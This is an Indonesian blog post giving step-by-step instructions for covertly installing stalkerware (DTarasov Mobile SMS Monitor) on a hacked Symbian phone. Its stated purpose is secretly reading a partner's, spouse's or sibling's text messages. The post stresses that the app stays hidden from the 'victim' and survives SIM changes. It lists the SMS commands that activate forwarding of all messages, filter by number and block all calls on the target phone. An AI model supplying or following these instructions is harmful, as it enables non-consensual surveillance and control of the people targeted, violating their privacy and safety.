-->

Cara Menyadap SMS Pada Ponsel Symbian

Assalammu'alaikum Wr Wb.
Cara Menyadap SMS Pada Ponsel Symbian - Sebenarnya sudah sejak lama saya ingin memposting sebuah applikasi symbian untuk menyadap SMS, tapi karena saya kawatir akan di salah gunakan oleh orang-orang yang tidak bertanggung jawab, maka saya tunda dan akhirnya akan saya bagikan pada kesempatan ini.

DTarasov Mobile SMS Monitor adalah sebuah applikasi symbian yang dapat menyadap SMS secara realtime, dan dapat memberikan penyadapan yang sangat akurat, karena semua aktifitas SMS keluar masuk yang di lakukan oleh ponsel yang di sadap akan direkam dan akan di kirim kepada anda, sebagai SMS dengan keterangan isi SMS dan nomor pengirim atau nomor yang di kirimi SMS oleh korban.

Applikasi DTarasov Mobile SMS Monitor ini memang sangat berguna bagi anda yang mempunyai pacar, istri, suami atau adik, yang takut selingkkuh atau melakukan SMS yang tidak semestinya, dan anda juga dapat mengontrol nomor siapa saja yang ingin anda sadap, atau memblock semua aktifitas SMS dan telepon pada ponsel korban.

SMS Monitor ini support atau dapat di jalankan pada ponsel Symbian S60v3, S60v5 yang sudah berstatus HACKED, dan mungkin juga cocok untuk Symbian S^3, Anna, dan Belle.

Untuk anda pengguna ponsel non-Symbian, bisa menggunakan Cara Menyadap SMS Sesama Telkomsel yang support untuk semua jenis ponsel.

    Untuk cara penyadapan dan cara kerja applikasi DTarasov Mobile SMS Monitor ini, bisa anda lihat di bawah:
  1. Pastikan ponsel yang akan di sadap adalah Symbian dan sudah HACKED, jika belum pernah atau belum berhasil meng-Hack ponsel Symbian, silahkan lihat artikel Kumpulan cara Hack Symbian terampuh dan terbaru.

  2. Download applikasi DTarasov_Mobile_SMS_Monitor_unsigned.sis (Update), lalu install pada ponsel korban. anda tidak perlu kawatir korban akan tahu kalau ponselnya sedang di sadap, karena applikasi ini belum mendukung UI (User Interface), jadi setelah anda install maka applikasinya tidak akan kelihatan, atau tersembunyi.

  3. Untuk ponsel Penyadap, anda dapat menggunakan ponsel apapun terserah anda, sampai ponsel layar hitam putih dan jadul sekalipun.

  4. Setelah semua langkah diatas selesai, sekarang saatnya anda mengaktifkan applikasi SMS Monitor tadi dengan cara menulis SMS pada ponsel yang akan anda gunakan untuk menyadap dengan isi SET ADMIN (nomor ponsel anda), contoh: SET ADMIN 6285737221171, lalu kirim pada nomor ponsel Symbian yang sudah anda install applikasi penyadap SMS tadi.

applikasi penyadap sms symbian.jpg

applikasi penyadap sms symbian2.jpg
Setelah anda melakukan semua langkah-langkah di atas, maka semua aktifitas SMS keluar masuk pada ponsel korban akan di kirim ke nomor ponsel yang di gunakan untuk mengaktifkan applikasi penyadap tadi. dan sekarang yang perlu anda ketahui adalah perintah-perintah lain untuk mengoperasikan applikasi SMS Monitor ini, jadi semua perintah hanya bisa di lakukan dengan menulis SMS pada ponsel korban, dan ponsel anda sebagai Adminnya.

Kelebihan applikasi penyadap SMS symbian ini selain bandel, juga sangat bisa di andalkan, bagaimana tidak! ponsel korban yang sudah di sadap akan terus terpantau walaupun korban mengganti simcard-nya dengan simcard baru, meskipun lain operator. kecuali ponsel korban hilang atau ganti ponsel lain.

    Berikut perintah-perintah yang dapat anda gunakan untuk mengontrol applikasi DTarasov Mobile SMS Monitor:
  • SET ADMIN (Nomor ponsel penyadap), adalah perintah untuk menentukan nomor penyadap.
  • ON, untuk mengaktifkan penyadapan.
  • OFF, untuk mematikan penyadapan.
  • ADD SENDER No. tujuan1, NO. tujuan2, adalah perintah untuk melakukan penyadapan pada nomor tertentu saja.
  • ADD, untuk kembali melakukan penyadapan kesemua nomor.
  • BLOCK ON, untuk memblokir semua telepon masuk dan keluar pada ponsel korban.
  • BLOCK OFF, untuk mematikan pemblokiran telepon masuk dan keluar.

Tulis dan kirim perintah di atas sebagai pesan teks ke nomor ponsel yang anda sadap, untuk mengontrol applikasi SMS monitor agar sesuai kehendak anda.

Sudah saya Test pada ponsel Nokia E63, N73, 5233, 5800, dan SonyEricsson Vivaz U5i.
    Peringatan:
  • Penyadapan hanya akan berjalan jika pulsa ponsel korban, cukup untuk mengirim hasil penyadapan keponsel anda.
  • Gunakan applikasi ini dengan bijak, dan jangan di gunakan sengaja untuk menjahili orang.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel